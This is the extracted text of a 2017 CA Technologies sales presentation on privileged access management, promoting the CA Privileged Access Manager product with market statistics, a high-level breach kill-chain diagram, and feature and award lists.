Managing Your Privileged Identities: The Choke Point of Advanced Attacks Shirief Nosseir EMEA Alliances Director Identity & API Management Tuesday, 16 May 2017
Agenda Why Privileged Access Management Why CA Technologies 2 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
The Common Thread? Privileged Accounts 3 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Privileged Access Management Trends Quick Take: 12 Lessons for Security & Risk Pros from the US OPM Breach, Forrester, 8 June 2015 Forrester estimates that 70% to 80% of data breaches involve the use of privileged and administrative passwords and credentials Risk Market Guide for Privileged Access Management, Gartner, 2 Aug 2016, ID: G00279025 Privileged Access Management market grew by 33% to reach $690 Million in 2015 Compliance Technology Refresh Emerging Enterprises CA Privileged Access Manager product licenses grew by 113% last year 4 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Privileged Accounts: The Emerging Front Line Organizations typically have 3-4x more privileged accounts than employees! Endpoints Workstation Mobile Industrial Control Systems Internet of Things On Premise Employees/Partners System Accounts Network Accounts DB Accounts Application Accounts Service Accounts Business Accounts Developer Accounts INTERNET Cloud Remote Privileged Users Partners/Contractors/ Employees Apps 5 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Privilege: Core of the Breach Kill Chain Threat Actor Network Perimeter EXTERNAL THREATS C&C, Data/IP Exfiltration Gain/Expand Access Elevate Privilege Wreak Havoc Trusted Insider Lateral Movement, Reconnaissance nsyd INTERNAL THREATS 6 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Risk & burden of privileged accounts Same password for local admin accounts HYBRID CLOUD ENVIRONMENT Privileged Personal Domain Accounts Individual Privileged Users Non-rotating passwords Hard-coded credentials Privileged Account Standing Access Software Defined Data Centre Public & Private Cloud Security Compliance Efficiency Traditional Data Center 7 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
CA Privileged Access Manager (CA PAM) Credential Vault Authentication Control Access Auto-Login (SSO) Record Sessions Enforce Policy Threat Analytics Log Everything HYBRID CLOUD ENVIRONMENT Software Defined Data Centre Privileged User Public & Private Cloud Integrated Controls and Unified Policy Management Traditional Data Center 8 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Key CA PAM Differentiators Scalability Quick Time-to-Value Defense-in-Depth CA PRIVILEGED ACCESS MANAGEMENT Lower TCO Most Highly Certified Platform Hybrid Enterprise 9 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
CA Privileged Access Manager (CA PAM) Privileged Account Management for the Hybrid Enterprise Traditional Data Center Software Defined Data Center HYBRID ENTERPRISE Public Cloud - IaaS SaaS Applications Mainframe, Windows, Linux, Unix, Networking Enterprise Admin Tools SDDC Console and APIs Cloud Console and APIs SaaS Consoles and APIs A New Security Layer - Control & Audit All Privileged Access Unified Policy Management CA Privileged Access Manager Identity Integration Enterprise-Class Core Hardware Appliance OVF Virtual Appliance AWS AMI 10 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Thank You
CA PAM: Application-to-Application Support Credential Vault Applications Applications Data 12 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Scalability Make sure to grow your capacity at a better & more predictable value CA PAM requires only a single appliance to protect thousands of resources supporting a large number of concurrent sessions. Danny MacAskill's Imaginate 13 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Quick Time-To-Value Realize immediate and long-term benefits with an appliance form factor Comprehensive solution based on single appliance Deploys in as little as few hours for smaller enviros Intuitive and cost-effective to operate & maintain Rapid time-to-value, without the unexpected resource requirements that come with a softwareonly solution requiring its own infrastructure 14 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Lower TCO Don t get caught with HIGH COST of OWNERSHIP CA provides an all-inclusive pricing model based on an appliance form factor CA pricing is easy to understand, without unexpected costs for multiple hardware/virtual instances, disaster recovery or high availability No incremental costs such as additional OS, DB and remote desktop licensing No huge cost of deployment, administration & maintenance 15 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
CA PAM for Hybrid Enterprise Unified Control for Administrative consoles and Guest Systems & Applications All AWS Regions VPC GOV Cloud AWS Public Cloud vsphere vcenter vshield vcloud NSX Manager Cloud Operations Automation AWS Management APIs/SDK AWS Management Console & APIs Cloud Admin Microsoft Online Services Office 365 Console Guest system & Application Admin 16 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION. CA Privileged Access Manager for Microsoft Online Services
Most Highly Certified Platform Make sure the solution is enterprise and government ready CA Privileged Access Manager is first & currently only PAM product certified for Common Criteria Using NIAP*-Preferred Protection Profile. What does this mean? CA PAM has met the Protection Profile evaluation required by NIAP before a commercially-of-the-shelf product can be considered for procurement by governments of 27 countries. A proof to private sector that CA PAM meets the federal government s demands *National Information Assurance Partnership 17 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Defense-In-Depth Avoid being the next victim Only CA can offer a comprehensive solution for privileged access management, delivering both the broad protection and simplified deployment of a network-based solution, and the fine-grained protections enabled by a host-based product. Unlike other vendors, CA offers a more future proof solution and allows you to better focus your investments using a risk-appropriate approach. 18 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Comprehensive Privileged Access Lifecycle Management Advanced Authentication CA Identity Suite CA Privileged Access Manager (CA PAM) CA PAM Server Control IDENTITY-BASED SECURITY PRIVILEGED-ACCESS SECURITY DEFENSE IN DEPTH HOST-BASED SECURITY 19 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Credential Safe Authentication Access Control Monitoring, Alerting & Intervention CA PAM Key Capabilities > Privileged credentials > SSH Session Keys >FIPS 140-2 Level 1 & 2 compliant encryption >Optional HSM for FIPS 140-2 Level 3 support > Application-to- Application Support >Industry s broadest platform support >Active Directory & LDAP >RADIUS integration >PKI/X.509 & Smartcard (PIV/CAC) support >Multi-factor authentication (CA Technologies, RSA, VASCO, SafeNet, Entrust, etc) > Privileged user SSO >Federated Identity & attribution >Role-based privileged user access limits >Zero Trust deny all, permit by exception policy engine >Continuous monitoring & logging >DVR-like session recording >Command filtering >Leapfrog prevention >Proactive policy violation prevention 20 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Risk & burden of privileged accounts Same password for local admin accounts HYBRID CLOUD ENVIRONMENT Privileged Personal Domain Accounts Excessive Permissions Local admin privileges for workstation users Non-rotating passwords Standing Access Lack of accountability & visibility Software Defined Data Centre Individual Privileged Users Privileged Account Public & Private Cloud Security Compliance Efficiency Traditional Data Center 21 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
Recognitions Overall Rating: Ovum Decision Matrix: Selecting a Privileged Identity Management Solution, November 2015 2016 Gold: Innovations in Cloud Security Silver: Innovations in Privileged Identity Management Best Privileged Access Management Solution Best Privileged Access Management Solution Best Overall IT Company 22 2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.